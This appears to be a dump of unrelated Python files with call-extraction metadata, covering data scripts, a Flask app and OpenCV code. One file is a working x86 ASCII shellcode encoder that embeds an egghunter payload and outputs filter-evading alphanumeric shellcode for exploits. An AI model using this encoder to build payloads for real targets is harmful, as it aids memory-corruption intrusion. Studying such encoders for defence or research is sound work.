] | [((220, 227), 'ontopy.World', 'World', ([], {}), '()\n', (225, 227), False, 'from ontopy import get_ontology, World\n'), ((97, 111), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (101, 111), False, 'from pathlib import Path\n')] |
from distutils.version import StrictVersion
import logging
def __get_version(version):
if 'dev' in str(version):
version = version[:version.find('.dev')]
return StrictVersion(version)
# Detect pandas and use a mock if missing
PANDAS_MIN_VERSION = '0.13.0'
try:
import pandas
if __get_version(pandas.__version__) < StrictVersion(PANDAS_MIN_VERSION):
HAS_PANDAS = False
logging.warn('Pandas version {} is not supported. Minimum required version: {}. '
'Pandas support will be disabled.'.format(pandas.__version__, PANDAS_MIN_VERSION))
else:
HAS_PANDAS = True
except:
HAS_PANDAS = False
import pandas_mock as pandas
# Detect matplotlib and use a mock if missing
try:
import matplotlib.pyplot
HAS_MATPLOTLIB = True
except:
HAS_MATPLOTLIB = False
import matplotlib_mock as matplotlib
# Detect numpy and use a mock if missing
NUMPY_MIN_VERSION = '1.4'
try:
import numpy
if __get_version(numpy.__version__) < StrictVersion(NUMPY_MIN_VERSION):
HAS_NUMPY = False
logging.warn('Numpy version {} is not supported. Minimum required version: {}. '
'Numpy support will be disabled.'.format(numpy.__version__, NUMPY_MIN_VERSION))
else:
HAS_NUMPY = True
except:
HAS_NUMPY = False
import numpy_mock as numpy
# Detect matplotlib and use a mock if missing
try:
import py4j
HAS_PY4J = True
except:
HAS_PY4J = False
import py4j_mock as py4j
| [
"distutils.version.StrictVersion"
] | [((180, 202), 'distutils.version.StrictVersion', 'StrictVersion', (['version'], {}), '(version)\n', (193, 202), False, 'from distutils.version import StrictVersion\n'), ((343, 376), 'distutils.version.StrictVersion', 'StrictVersion', (['PANDAS_MIN_VERSION'], {}), '(PANDAS_MIN_VERSION)\n', (356, 376), False, 'from distutils.version import StrictVersion\n'), ((1018, 1050), 'distutils.version.StrictVersion', 'StrictVersion', (['NUMPY_MIN_VERSION'], {}), '(NUMPY_MIN_VERSION)\n', (1031, 1050), False, 'from distutils.version import StrictVersion\n')] |
from pyspark import SparkConf, SparkContext
from pyspark import SQLContext
from pyspark.sql.functions import udf
import string
conf = SparkConf().setAppName('MovieRating')
sc = SparkContext(conf = conf)
sqlContext = SQLContext(sc)
df = sqlContext.read.format("com.databricks.spark.csv").option("header", "true").option("inferschema", "true").load("ratings.csv")
df2 = sqlContext.read.format("com.databricks.spark.csv").option("header", "true").option("inferschema", "true").load("movies.csv")
rddmovies = df2.rdd
rddratings = df.rdd
suma = rddratings.map(lambda x: (x[1],x[2]))
count = suma.map(lambda x: (x[0],1))
suma = suma.reduceByKey(lambda a, b: float(a) + float(b))
count = count.reduceByKey(lambda a, b: a + b)
average = suma.join(count)
average = average.map(lambda x: (x[0], x[1][0]/x[1][1]))
moviesWithAverage = average.join(rddmovies)
moviesTable = moviesWithAverage.map(lambda x: (x[1][1], x[1][0]))
rddfinal = moviesTable.map(lambda x: (x[0][len(x[0])-5]+x[0][len(x[0])-4]+x[0][len(x[0])-3]+x[0][len(x[0])-2],x[0],x[1] if 5 <= len(x[0]) else x[0],x[0],x[1]))
rddfinal = rddfinal.filter(lambda x: x[0].isdigit())
rddfinal = rddfinal.map(lambda x: (x[0].encode("ascii", "ignore"), (x[1].encode("ascii", "ignore"),x[2])))
rddfinal = rddfinal.reduceByKey(lambda a,b: ((a[0], a[1]) if a[1] > b[1] else ((a [0] + "; " + b[0], b[1]) if a[1] == b[1] else (b[0], b[1])))).sortByKey()
rddfinal.saveAsTextFile("outputApartadoA.txt")
| [
"pyspark.SparkContext",
"pyspark.SparkConf",
"pyspark.SQLContext"
] | [((179, 202), 'pyspark.SparkContext', 'SparkContext', ([], {'conf': 'conf'}), '(conf=conf)\n', (191, 202), False, 'from pyspark import SparkConf, SparkContext\n'), ((218, 232), 'pyspark.SQLContext', 'SQLContext', (['sc'], {}), '(sc)\n', (228, 232), False, 'from pyspark import SQLContext\n'), ((136, 147), 'pyspark.SparkConf', 'SparkConf', ([], {}), '()\n', (145, 147), False, 'from pyspark import SparkConf, SparkContext\n')] |
#!/usr/bin/env python3
################################################################################
# INTRODUCTION
################################################################################
# Encoder Title: ASCII shellcode encoder via AND, SUB, PUSH
# Date: 26.6.2019
# Encoder Author: <NAME>, www.mmquant.net
# Tested on: Linux ubuntu 3.13.0-32-generic, x86
# Special thx to: Corelanc0d3r for intro to this technique
#
# Description:
# This encoder is based on egghunter found in https://www.exploit-db.com/exploits/5342
# Core idea is that every dword can be derived using 3 SUB instructions
# with operands consisting strictly of ASCII compatible bytes.
#
# What it does?:
# Suppose that we want to push \x05\xEB\xD1\x8B (0x8BD1EB05) to the stack.
# Than we can do it as follows:
#
# AND EAX, 3F465456
# AND EAX, 40392B29 ; Two AND instructions zero EAX
# SUB EAX, 3E716230 ; Subtracting 3 dwords consisting
# SUB EAX, 5D455523 ; of ASCII compatible bytes from 0x00000000
# SUB EAX, 5E5D7722 ; we get EAX = 0x8BD1EB05
# PUSH EAX
# Mandatory bytes:
# \x25 AND EAX, imm32
# \x2d SUB EAX, imm32
# \x50 PUSH EAX
# \x61 POPAD
# How to use:
# Edit the SETTINGS section and simply run as
# ./ASCIIencoder
# ProTip:
# Take special attention to the memory between the end of decoder instructions
# and the beginning of decoded shellcode. Program flow must seamlessly step over
# this memory. If this "bridge memory area" contains illegal opcodes they can
# be rewritten with additional PUSH instruction appended to the end of generated
# shellcode. Use for example PUSH 0x41414141.
################################################################################
import itertools
import struct
import random
import sys
assert sys.version_info >= (3, 6)
################################################################################
# CONSTANTS - no changes needed here
################################################################################
# ASCII character set
L_CASE = bytearray(range(0x61, 0x7b)) # abcdefghijklmnopqrstuvwxyz
U_CASE = bytearray(range(0x41, 0x5b)) # ABCDEFGHIJKLMNOPQRSTUVWXYZ
NUMBERS = bytearray(range(0x30, 0x3a)) # 0123456789
SPECIAL_CHARS = bytearray(
itertools.chain(
range(0x21, 0x30), # !"#$%&\'()*+,-.
range(0x3a, 0x41), # :;<=>?
range(0x5b, 0x61), # [\\]^_
range(0x7b, 0x7f) # {|}
)
)
ASCII_NOPS = b'\x41\x42\x43\x44' # and many more
ALL_CHARS = (L_CASE + U_CASE + NUMBERS + SPECIAL_CHARS)
################################################################################
# SETTINGS - enter shellcode, select character set and bad chars
################################################################################
input_shellcode = (
b'\x8b\xd1\xeb\x05\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e'
b'\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf'
b'\x75\xe7\xff\xe7'
)
# input_charset = U_CASE + L_CASE
input_charset = ALL_CHARS
# badchars = b''
badchars = b''
nops = ASCII_NOPS
################################################################################
# CORE - no changes needed here
################################################################################
class ASCII_Encoder(object):
def __init__(self, shellcode_, charset_, badchars_, nops_):
# Constructor args
self.shellcode = bytearray(shellcode_)
self.charset = charset_
self.badchars = badchars_
self.nops = nops_
# Private vars
self.encoded_dwords = []
self.twos_comps = []
self.sub_operands = []
self.payload = bytearray()
def encode(self):
self.align_to_dwords()
self.remove_badchars()
self.derive_dwords_sub()
self.compensate_overflow()
self.derived_dwords_to_sub_operands()
self.twos_comp_check()
self.compile_payload()
def align_to_dwords(self):
# Input shellcode alignment to dword multiples
nop = b'\x90'
pad_count = 4 - (len(self.shellcode) % 4)
if 0 < pad_count < 4:
self.shellcode += nop * pad_count
def remove_badchars(self):
for badchar in self.badchars:
self.charset = self.charset.replace(bytes([badchar]), b'')
self.nops = self.nops.replace(bytes([badchar]), b'')
def derive_dwords_sub(self):
def get_sub_encoding_bytes(target):
"""
target x y z
0x100 - (0x21+0x21) = 0xbe
We need to select x, y, z such that it gives target when summed and all of
x, y, z is ASCII and non-badchar
"""
# Get all possible solutions
all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
results = []
for x, y in all_xy:
z = target - (x + y)
# Get only bytes which are ASCII and non-badchar
if (0 < z < 256) and (z in self.charset):
results.append({
'x': x,
'y': y,
'z': z,
'of': True if target >= 0x100 else False
})
# Choose random solution
return random.choice(results)
for dword in struct.iter_unpack('<L', self.shellcode):
# 32-bit 2's complement
twos_comp = (dword[0] ^ 0xffffffff) + 1
self.twos_comps.append(twos_comp)
encoded_block = []
for byte_ in struct.pack('>L', twos_comp):
# Will overflow be used when calculating this byte using 3 SUB instructions?
if byte_ / 3 < min(self.charset):
byte_ += 0x100
encoded_block.append(
get_sub_encoding_bytes(byte_))
pass
self.encoded_dwords.append(encoded_block)
def compensate_overflow(self):
# If neighbor lower byte overflow then subtract 1 from max(x, y, z)
for dword in self.encoded_dwords:
for solution, next_solution in zip(dword, dword[1:]):
if next_solution['of']:
max_value_key = max(solution, key=solution.get)
solution[max_value_key] -= 1
def derived_dwords_to_sub_operands(self):
for dword in self.encoded_dwords:
sub_operand_0 = struct.pack('<BBBB',
*[solution['x'] for solution in dword])
sub_operand_1 = struct.pack('<BBBB',
*[solution['y'] for solution in dword])
sub_operand_2 = struct.pack('<BBBB',
*[solution['z'] for solution in dword])
self.sub_operands.append([
sub_operand_0,
sub_operand_1,
sub_operand_2
])
def twos_comp_check(self):
# Check if calculated dwords for SUB instruction give 2's complement if they are summed
for twos_comp, sub_operand in zip(self.twos_comps, self.sub_operands):
sup_operand_sum = sum(
[int.from_bytes(dw, byteorder='big') for dw in sub_operand])
# Correction of sum if there is overflow on the highest byte
if sup_operand_sum > 0xffffffff:
sup_operand_sum -= 0x100000000
assert (twos_comp == sup_operand_sum)
def compile_payload(self):
def derive_bytes_and():
all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
results = []
for x, y in all_xy:
if x + y == 127:
results.append((x, y))
while 1:
yield random.choice(results)
def derive_dwords_and():
gen_bytes = derive_bytes_and()
bytes_ = []
for _ in range(0, 4):
bytes_.append(next(gen_bytes))
return bytes_
# POPAD n times to adjust ESP.
# Decoded shellcode must be written after the decoder stub
self.payload += b'\x61' * (len(self.encoded_dwords))
for sub_operand in reversed(self.sub_operands):
# Clearing EAX instructions with AND instructions
bytes_ = derive_dwords_and()
self.payload += b'\x25' + struct.pack('<BBBB',
*[byte_[0] for byte_ in bytes_])
self.payload += b'\x25' + struct.pack('<BBBB',
*[byte_[1] for byte_ in bytes_])
# Encoded shellcode with SUB instructions
self.payload += b'\x2d' + sub_operand[0][::-1]
self.payload += b'\x2d' + sub_operand[1][::-1]
self.payload += b'\x2d' + sub_operand[2][::-1]
# Push EAX
self.payload += b'\x50'
# Pad with NOPs
self.payload += bytes(random.choices(self.nops, k=9))
def print_payload(self):
print('Original payload length: {}'.format(len(input_shellcode)))
print('Encoded payload length: {}'.format(len(self.payload)))
print('hex: ',
'\\x' + '\\x'.join('{:02x}'.format(byte) for byte in self.payload))
if __name__ == '__main__':
encoder = ASCII_Encoder(input_shellcode, input_charset, badchars, nops)
encoder.encode()
encoder.print_payload()
| [
"random.choice",
"struct.iter_unpack",
"struct.pack",
"random.choices",
"itertools.combinations_with_replacement"
] | [((5369, 5409), 'struct.iter_unpack', 'struct.iter_unpack', (['"""<L"""', 'self.shellcode'], {}), "('<L', self.shellcode)\n", (5387, 5409), False, 'import struct\n'), ((5324, 5346), 'random.choice', 'random.choice', (['results'], {}), '(results)\n', (5337, 5346), False, 'import random\n'), ((5603, 5631), 'struct.pack', 'struct.pack', (['""">L"""', 'twos_comp'], {}), "('>L', twos_comp)\n", (5614, 5631), False, 'import struct\n'), ((6474, 6534), 'struct.pack', 'struct.pack', (['"""<BBBB"""', "*[solution['x'] for solution in dword]"], {}), "('<BBBB', *[solution['x'] for solution in dword])\n", (6485, 6534), False, 'import struct\n'), ((6603, 6663), 'struct.pack', 'struct.pack', (['"""<BBBB"""', "*[solution['y'] for solution in dword]"], {}), "('<BBBB', *[solution['y'] for solution in dword])\n", (6614, 6663), False, 'import struct\n'), ((6732, 6792), 'struct.pack', 'struct.pack', (['"""<BBBB"""', "*[solution['z'] for solution in dword]"], {}), "('<BBBB', *[solution['z'] for solution in dword])\n", (6743, 6792), False, 'import struct\n'), ((9026, 9056), 'random.choices', 'random.choices', (['self.nops'], {'k': '(9)'}), '(self.nops, k=9)\n', (9040, 9056), False, 'import random\n'), ((4771, 4827), 'itertools.combinations_with_replacement', 'itertools.combinations_with_replacement', (['self.charset', '(2)'], {}), '(self.charset, 2)\n', (4810, 4827), False, 'import itertools\n'), ((7608, 7664), 'itertools.combinations_with_replacement', 'itertools.combinations_with_replacement', (['self.charset', '(2)'], {}), '(self.charset, 2)\n', (7647, 7664), False, 'import itertools\n'), ((8443, 8496), 'struct.pack', 'struct.pack', (['"""<BBBB"""', '*[byte_[0] for byte_ in bytes_]'], {}), "('<BBBB', *[byte_[0] for byte_ in bytes_])\n", (8454, 8496), False, 'import struct\n'), ((8580, 8633), 'struct.pack', 'struct.pack', (['"""<BBBB"""', '*[byte_[1] for byte_ in bytes_]'], {}), "('<BBBB', *[byte_[1] for byte_ in bytes_])\n", (8591, 8633), False, 'import struct\n'), ((7842, 7864), 'random.choice', 'random.choice', (['results'], {}), '(results)\n', (7855, 7864), False, 'import random\n')] |
from __future__ import print_function, unicode_literals
from datetime import datetime
from netmiko import ConnectHandler
from my_devices import device_list
def Netmiko_connect(device,command):
"""Execute show version command using Netmiko."""
print()
print("#" * 80)
remote_conn = ConnectHandler(**device)
output = remote_conn.send_command_expect("show version")
remote_conn.disconnect()
return output
def main():
start_time = datetime.now()
for device in device_list:
output =Netmiko_connect(device, "show version")
print(output)
print("\nElapsed time: " + str(datetime.now() - start_time))
if __name__ == "__main__":
main()
| [
"netmiko.ConnectHandler",
"datetime.datetime.now"
] | [((300, 324), 'netmiko.ConnectHandler', 'ConnectHandler', ([], {}), '(**device)\n', (314, 324), False, 'from netmiko import ConnectHandler\n'), ((465, 479), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (477, 479), False, 'from datetime import datetime\n'), ((630, 644), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (642, 644), False, 'from datetime import datetime\n')] |
# https://adventofcode.com/2021/day/9
from math import prod
from src.util.types import Data, Point2, Solution
def prepare_data(data: str) -> tuple[tuple[tuple[int, ...], ...], list[Point2]]:
heightmap = tuple(tuple(int(x) for x in list(line)) for line in data.splitlines())
low_points = get_low_points(heightmap)
return heightmap, low_points
def get_neighbors(x, y, max_x, max_y):
neighbors = []
if x > 0:
neighbors.append(Point2(x - 1, y))
if x < max_x:
neighbors.append(Point2(x + 1, y))
if y > 0:
neighbors.append(Point2(x, y - 1))
if y < max_y:
neighbors.append(Point2(x, y + 1))
return neighbors
def get_low_points(heightmap: tuple[tuple[int, ...], ...]) -> list[Point2]:
low_points = []
max_x = len(heightmap[0]) - 1
max_y = len(heightmap) - 1
for y, row in enumerate(heightmap):
for x, height in enumerate(row):
neighbors = get_neighbors(x, y, max_x, max_y)
if all(height < heightmap[n.y][n.x] for n in neighbors):
low_points.append(Point2(x, y))
return low_points
def flood_fill(heightmap, origin, max_x, max_y):
neighbors = [origin]
basin_members = {origin}
while neighbors:
current = neighbors.pop()
new_neighbors = get_neighbors(current.x, current.y, max_x, max_y)
for nn in new_neighbors:
# Assuming all basins are surrounded by nines, which is true for the sample.
if nn not in basin_members and heightmap[nn.y][nn.x] < 9:
neighbors.append(nn)
basin_members.add(nn)
return len(basin_members)
def part_1(heightmap, low_points):
return sum(heightmap[lp.y][lp.x] + 1 for lp in low_points)
def part_2(heightmap, low_points):
max_x = len(heightmap[0]) - 1
max_y = len(heightmap) - 1
basin_sizes = [flood_fill(heightmap, lp, max_x, max_y) for lp in low_points]
basin_sizes.sort(reverse=True)
return prod(basin_sizes[:3])
def solve(data: Data) -> Solution:
solution = Solution()
sample_data = prepare_data(data.samples[0])
solution.samples_part_1.append(part_1(*sample_data))
solution.samples_part_2.append(part_2(*sample_data))
challenge_data = prepare_data(data.input)
solution.part_1 = part_1(*challenge_data)
solution.part_2 = part_2(*challenge_data)
return solution
| [
"src.util.types.Point2",
"src.util.types.Solution",
"math.prod"
] | [((1976, 1997), 'math.prod', 'prod', (['basin_sizes[:3]'], {}), '(basin_sizes[:3])\n', (1980, 1997), False, 'from math import prod\n'), ((2050, 2060), 'src.util.types.Solution', 'Solution', ([], {}), '()\n', (2058, 2060), False, 'from src.util.types import Data, Point2, Solution\n'), ((457, 473), 'src.util.types.Point2', 'Point2', (['(x - 1)', 'y'], {}), '(x - 1, y)\n', (463, 473), False, 'from src.util.types import Data, Point2, Solution\n'), ((518, 534), 'src.util.types.Point2', 'Point2', (['(x + 1)', 'y'], {}), '(x + 1, y)\n', (524, 534), False, 'from src.util.types import Data, Point2, Solution\n'), ((575, 591), 'src.util.types.Point2', 'Point2', (['x', '(y - 1)'], {}), '(x, y - 1)\n', (581, 591), False, 'from src.util.types import Data, Point2, Solution\n'), ((636, 652), 'src.util.types.Point2', 'Point2', (['x', '(y + 1)'], {}), '(x, y + 1)\n', (642, 652), False, 'from src.util.types import Data, Point2, Solution\n'), ((1080, 1092), 'src.util.types.Point2', 'Point2', (['x', 'y'], {}), '(x, y)\n', (1086, 1092), False, 'from src.util.types import Data, Point2, Solution\n')] |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cv2
import numpy as np
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("filename", type=str)
args = parser.parse_args()
im = cv2.imread(args.filename)
gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(gray, (5, 5), 0)
ret, thresh = cv2.threshold(blurred, 0, 255, cv2.THRESH_BINARY |
cv2.THRESH_OTSU)
hsv = cv2.cvtColor(im, cv2.COLOR_BGR2HSV)
# hsv_blurred = cv2.GaussianBlur(hsv, (5, 5), 0)
hsv_blurred = hsv
ret, thresh_h = cv2.threshold(hsv_blurred[:, :, 0], 0, 255,
cv2.THRESH_BINARY | cv2.THRESH_OTSU)
ret, thresh_s = cv2.threshold(hsv_blurred[:, :, 1], 0, 255,
cv2.THRESH_BINARY | cv2.THRESH_OTSU)
ret, thresh_v = cv2.threshold(hsv_blurred[:, :, 2], 0, 255,
cv2.THRESH_BINARY | cv2.THRESH_OTSU)
# threshold on each of the channels, see what happens
img = gray.copy()
cimg = im.copy()
circles = cv2.HoughCircles(img,cv2.HOUGH_GRADIENT,1,20,
param1=50,param2=30,minRadius=0,maxRadius=0)
circles = np.uint16(np.around(circles))
for i in circles[0,:]:
# draw the outer circle
cv2.circle(cimg,(i[0],i[1]),i[2],(0,255,0),2)
# draw the center of the circle
cv2.circle(cimg,(i[0],i[1]),2,(0,0,255),3)
cv2.imshow('detected circles',cimg)
cv2.imshow("Image", im)
cv2.imshow("thresh bw", thresh)
cv2.imshow("thresh hue", thresh_h)
cv2.imshow("thresh sat", thresh_s)
cv2.imshow("thresh val", thresh_v)
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"argparse.ArgumentParser",
"cv2.threshold",
"cv2.HoughCircles",
"cv2.imshow",
"cv2.waitKey",
"cv2.circle",
"cv2.destroyAllWindows",
"numpy.around",
"cv2.cvtColor",
"cv2.GaussianBlur",
"cv2.imread"
] | [((632, 657), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (655, 657), False, 'import argparse\n'), ((733, 758), 'cv2.imread', 'cv2.imread', (['args.filename'], {}), '(args.filename)\n', (743, 758), False, 'import cv2\n'), ((766, 802), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_BGR2GRAY'], {}), '(im, cv2.COLOR_BGR2GRAY)\n', (778, 802), False, 'import cv2\n'), ((813, 846), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['gray', '(5, 5)', '(0)'], {}), '(gray, (5, 5), 0)\n', (829, 846), False, 'import cv2\n'), ((861, 928), 'cv2.threshold', 'cv2.threshold', (['blurred', '(0)', '(255)', '(cv2.THRESH_BINARY | cv2.THRESH_OTSU)'], {}), '(blurred, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n', (874, 928), False, 'import cv2\n'), ((944, 979), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_BGR2HSV'], {}), '(im, cv2.COLOR_BGR2HSV)\n', (956, 979), False, 'import cv2\n'), ((1064, 1149), 'cv2.threshold', 'cv2.threshold', (['hsv_blurred[:, :, 0]', '(0)', '(255)', '(cv2.THRESH_BINARY | cv2.THRESH_OTSU)'], {}), '(hsv_blurred[:, :, 0], 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU\n )\n', (1077, 1149), False, 'import cv2\n'), ((1169, 1254), 'cv2.threshold', 'cv2.threshold', (['hsv_blurred[:, :, 1]', '(0)', '(255)', '(cv2.THRESH_BINARY | cv2.THRESH_OTSU)'], {}), '(hsv_blurred[:, :, 1], 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU\n )\n', (1182, 1254), False, 'import cv2\n'), ((1274, 1359), 'cv2.threshold', 'cv2.threshold', (['hsv_blurred[:, :, 2]', '(0)', '(255)', '(cv2.THRESH_BINARY | cv2.THRESH_OTSU)'], {}), '(hsv_blurred[:, :, 2], 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU\n )\n', (1287, 1359), False, 'import cv2\n'), ((1463, 1563), 'cv2.HoughCircles', 'cv2.HoughCircles', (['img', 'cv2.HOUGH_GRADIENT', '(1)', '(20)'], {'param1': '(50)', 'param2': '(30)', 'minRadius': '(0)', 'maxRadius': '(0)'}), '(img, cv2.HOUGH_GRADIENT, 1, 20, param1=50, param2=30,\n minRadius=0, maxRadius=0)\n', (1479, 1563), False, 'import cv2\n'), ((1807, 1843), 'cv2.imshow', 'cv2.imshow', (['"""detected circles"""', 'cimg'], {}), "('detected circles', cimg)\n", (1817, 1843), False, 'import cv2\n'), ((1847, 1870), 'cv2.imshow', 'cv2.imshow', (['"""Image"""', 'im'], {}), "('Image', im)\n", (1857, 1870), False, 'import cv2\n'), ((1871, 1902), 'cv2.imshow', 'cv2.imshow', (['"""thresh bw"""', 'thresh'], {}), "('thresh bw', thresh)\n", (1881, 1902), False, 'import cv2\n'), ((1903, 1937), 'cv2.imshow', 'cv2.imshow', (['"""thresh hue"""', 'thresh_h'], {}), "('thresh hue', thresh_h)\n", (1913, 1937), False, 'import cv2\n'), ((1938, 1972), 'cv2.imshow', 'cv2.imshow', (['"""thresh sat"""', 'thresh_s'], {}), "('thresh sat', thresh_s)\n", (1948, 1972), False, 'import cv2\n'), ((1973, 2007), 'cv2.imshow', 'cv2.imshow', (['"""thresh val"""', 'thresh_v'], {}), "('thresh val', thresh_v)\n", (1983, 2007), False, 'import cv2\n'), ((2009, 2023), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2020, 2023), False, 'import cv2\n'), ((2024, 2047), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (2045, 2047), False, 'import cv2\n'), ((1602, 1620), 'numpy.around', 'np.around', (['circles'], {}), '(circles)\n', (1611, 1620), True, 'import numpy as np\n'), ((1678, 1730), 'cv2.circle', 'cv2.circle', (['cimg', '(i[0], i[1])', 'i[2]', '(0, 255, 0)', '(2)'], {}), '(cimg, (i[0], i[1]), i[2], (0, 255, 0), 2)\n', (1688, 1730), False, 'import cv2\n'), ((1764, 1813), 'cv2.circle', 'cv2.circle', (['cimg', '(i[0], i[1])', '(2)', '(0, 0, 255)', '(3)'], {}), '(cimg, (i[0], i[1]), 2, (0, 0, 255), 3)\n', (1774, 1813), False, 'import cv2\n')] |
from setuptools import find_packages, setup
import re
# parse dyneusr/_version.py
try:
version_fn = 'dyneusr/_version.py'
with open(version_fn) as version_fd:
version = version_fd.read()
version_re = r"^__version__ = ['\"]([^'\"]*)['\"]"
version = re.findall(version_re, version, re.M)[0]
except:
raise RuntimeError("Unable to read version in {}.".format(version_fn))
# parse requirements.txt
with open('requirements.txt') as f:
install_requires = [_ for _ in f.read().split('\n')
if len(_) and _[0].isalpha()]
# parse README.md
with open('README.md') as f:
long_description = f.read()
# run setup
setup(
name='dyneusr',
version=version,
description='Dynamical Neural Spatiotemporal Representations.',
long_description=long_description,
long_description_content_type="text/markdown",
author='<NAME>',
author_email='<EMAIL>',
url='https://braindynamicslab.github.io/dyneusr',
license='BSD-3',
packages=find_packages(),
include_package_data=True,
install_requires=install_requires,
python_requires='>=3.6',
classifiers=[
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Information Analysis",
"Topic :: Scientific/Engineering :: Visualization",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
keywords='brain dynamics, topology data analysis, neuroimaging, brain networks, mapper, visualization',
)
| [
"re.findall",
"setuptools.find_packages"
] | [((273, 310), 're.findall', 're.findall', (['version_re', 'version', 're.M'], {}), '(version_re, version, re.M)\n', (283, 310), False, 'import re\n'), ((1008, 1023), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (1021, 1023), False, 'from setuptools import find_packages, setup\n')] |
from flask import Flask, render_template, request
from api_hh_skills import parsing_skills
from api_hh_salary import parsing_av_salary
from db_sqlalchemy_creator import Vacancy_info, City, Vacancy, Contacts
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from sqlalchemy import exc
from datetime import datetime
app = Flask(__name__)
engine = create_engine('sqlite:///orm1.sqlite', echo=False)
Base = declarative_base()
@app.route('/')
def main_index():
return render_template('index.html')
@app.route('/request_sgk')
def request_sgk():
return render_template('request_sgk.html')
@app.route('/request_api')
def request_api():
return render_template('request_api.html')
@app.route('/parsing_answer', methods = ['POST'])
def parsing_answer():
city = request.form['city']
vacancy = request.form['vacancy']
# Получение информации по средней зарплате путем парсинга сайта
av_salary = round(parsing_av_salary(city, vacancy), 2)
if av_salary == 0:
av_salary = 'Нет информации'
# Получение информации об основных навыках путем парсинга сайта
skills_list = parsing_skills(city, vacancy)
len_skills = len(skills_list)
if len_skills == 0:
skills_info = 'Нет информации'
else:
skills_info = ''
for i in range(len_skills-1):
skills_info = skills_info + skills_list[i] + ', '
skills_info = skills_info + skills_list[len_skills-1]
# Наполнение шаблона для передачи информации на сайт
data = {
'city': city,
'vacancy': vacancy,
'av_salary': av_salary,
'skills_info': skills_info}
# Загрузка полученной информации в базу SQLAlchemy
try:
session.add(City(city))
session.commit()
except exc.IntegrityError:
session.rollback()
try:
session.add(Vacancy(vacancy))
session.commit()
except exc.IntegrityError:
session.rollback()
try:
session.add(Vacancy_info(session.query(City).filter(City.city == city).first().id,
session.query(Vacancy).filter(Vacancy.vacancy == vacancy).first().id,
av_salary, skills_info))
session.commit()
except exc.IntegrityError:
session.rollback()
return render_template('parsing_answer.html', data=data)
@app.route('/contacts')
def contacts():
return render_template('contacts.html')
@app.route('/contacts_ok', methods = ['POST'])
def contacts_ok():
email = request.form['email']
name = request.form['name']
post_mail = request.form['post_mail']
message = request.form['message'].strip()
# Загрузка полученной информации в базу SQLAlchemy + сегодняшняя дата
try:
session.add(Contacts(email, name, post_mail, message, datetime.today()))
session.commit()
except exc.IntegrityError:
session.rollback()
return render_template('contacts_ok.html', message=message)
if __name__ == "__main__":
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
# app.run() # в режиме отладки на одном компьютере
# хорош для начала разработки на локальном сервере. Но это потребует ручного перезапуска сервера после каждого изменения в коде.
# app.run(host='0.0.0.0') # сделать сервер общедоступным в локальной сети
app.run(debug=True) # сервер будет сам перегружаться после каждого изменения в коде | [
"flask.render_template",
"sqlalchemy.orm.sessionmaker",
"flask.Flask",
"sqlalchemy.create_engine",
"api_hh_salary.parsing_av_salary",
"db_sqlalchemy_creator.City",
"db_sqlalchemy_creator.Vacancy",
"sqlalchemy.ext.declarative.declarative_base",
"datetime.datetime.today",
"api_hh_skills.parsing_skil... | [((403, 418), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (408, 418), False, 'from flask import Flask, render_template, request\n'), ((428, 478), 'sqlalchemy.create_engine', 'create_engine', (['"""sqlite:///orm1.sqlite"""'], {'echo': '(False)'}), "('sqlite:///orm1.sqlite', echo=False)\n", (441, 478), False, 'from sqlalchemy import create_engine\n'), ((486, 504), 'sqlalchemy.ext.declarative.declarative_base', 'declarative_base', ([], {}), '()\n', (502, 504), False, 'from sqlalchemy.ext.declarative import declarative_base\n'), ((550, 579), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (565, 579), False, 'from flask import Flask, render_template, request\n'), ((638, 673), 'flask.render_template', 'render_template', (['"""request_sgk.html"""'], {}), "('request_sgk.html')\n", (653, 673), False, 'from flask import Flask, render_template, request\n'), ((731, 766), 'flask.render_template', 'render_template', (['"""request_api.html"""'], {}), "('request_api.html')\n", (746, 766), False, 'from flask import Flask, render_template, request\n'), ((1190, 1219), 'api_hh_skills.parsing_skills', 'parsing_skills', (['city', 'vacancy'], {}), '(city, vacancy)\n', (1204, 1219), False, 'from api_hh_skills import parsing_skills\n'), ((2414, 2463), 'flask.render_template', 'render_template', (['"""parsing_answer.html"""'], {'data': 'data'}), "('parsing_answer.html', data=data)\n", (2429, 2463), False, 'from flask import Flask, render_template, request\n'), ((2516, 2548), 'flask.render_template', 'render_template', (['"""contacts.html"""'], {}), "('contacts.html')\n", 